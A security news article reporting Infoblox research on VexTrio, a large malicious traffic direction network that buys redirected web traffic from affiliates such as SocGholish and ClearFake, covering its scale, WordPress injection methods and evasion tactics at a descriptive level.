VexTrio is a massive and complex malicious TDS (traffic direction system) organization. It has a network of more than 60 affiliates that divert traffic into VexTrio, while it also operates its own TDS network. While aspects of the operation have been discovered and analyzed by different researchers, the core network has remained largely unknown.
Two of the affiliates, for example, are ClearFake and SocGholish — both known through their malware. VexTrio, however, is purely a traffic broker not tied to or recognized by any malware.
Infoblox, a network visibility and control firm, has been tracking VexTrio for nearly two years, but has only more recently come to understand the extent of the operations. Its report published today describes the size and pervasiveness of the organization.
There appears to be a stable relationship between affiliates and VexTrio: SocGholish has partnered with VexTrio for nearly two years at least, while ClearFake has had such a partnership throughout its lifetime.
A TDS system is commonly used to connect visitors and targeted advertising based on discovered characteristics of the visitor. A malicious TDS uses the same principles to connect visitors and malicious websites or pages. This is commonly achieved by compromising websites — very often WordPress sites — and injecting malicious code into the site. The code can discover characteristics of the visitor before selecting the next action.
Each of the affiliates have their own TDS network. Some simply send the details to VexTrio. Others will use some of the opportunities and send the rest to VexTrio, depending on the visitor. For example, notes the report, “SocGholish only targets Windows OS users that are first-time visitors, according to their User-Agent, IP address, and browser cookies. For visitors that are incompatible with SocGholish exploitation methods (eg, macOS devices), the actors will still capitalize on the web traffic by redirecting them to VexTrio TDS servers.”
The most common method of collecting traffic used by the affiliates is a drive-by compromise targeting vulnerable WordPress sites. Malicious JavaScript is injected into the HTML pages. The complexity of the JavaScript varies between the affiliates, but it typically acts as a redirect to VexTrio servers. It is not unknown for a single site to be compromised by multiple affiliates. In this case, VexTrio rewards the affiliates on a first come, first served basis.
VexTrio consequently combines traffic from multiple affiliates with traffic garnered from its own TDS network. Sometimes it may use this traffic in its own malicious campaigns, but will otherwise sell the details to other actors for separate malware, phishing, or various scam purposes.
VexTrio has become a major broker in the criminal underworld. It comprises more than 70,000 known domains, nearly half of which Infoblox has observed within its own customers. “We have seen VexTrio activity in as much as 19% of networks on a single day since 2020, and in over half of all customer networks in the last two years,” comment the researchers.
There is always a cat and mouse game between cybercriminals and security defenders. VexTrio has been a prolific actor using DNS to carry out attacks across the globe. DNS leaves a heavy footprint in network logs. This may not stop an operation but allows researchers to study the attacker. Recently, notes Infoblox, VexTrio has migrated a large portion of its infrastructure to shared hosting providers, making them more difficult – but not impossible – to track.
Another method designed to avoid researchers is a delay between compromise and effect. The researchers purposely activated a VexTrio campaign known as robot Captcha, with no immediate effect. But, “After waiting 24 hours and performing a system reboot,” note the researchers, “our test machine received many push notifications disguised as messages from McAfee.”
The complex business model operated by VexTrio has enabled it to remain nameless for the last six years. It is now known. That same complexity, however, makes it very resilient and difficult to take down.
Related: BlackBerry Researchers Dive Into Prometheus TDS Operations
Related: Cybercrime Gang Uses Screenlogger to Identify High-Value Targets
Related: Microsoft Warns of Cybercrime Group Delivering Royal Ransomware
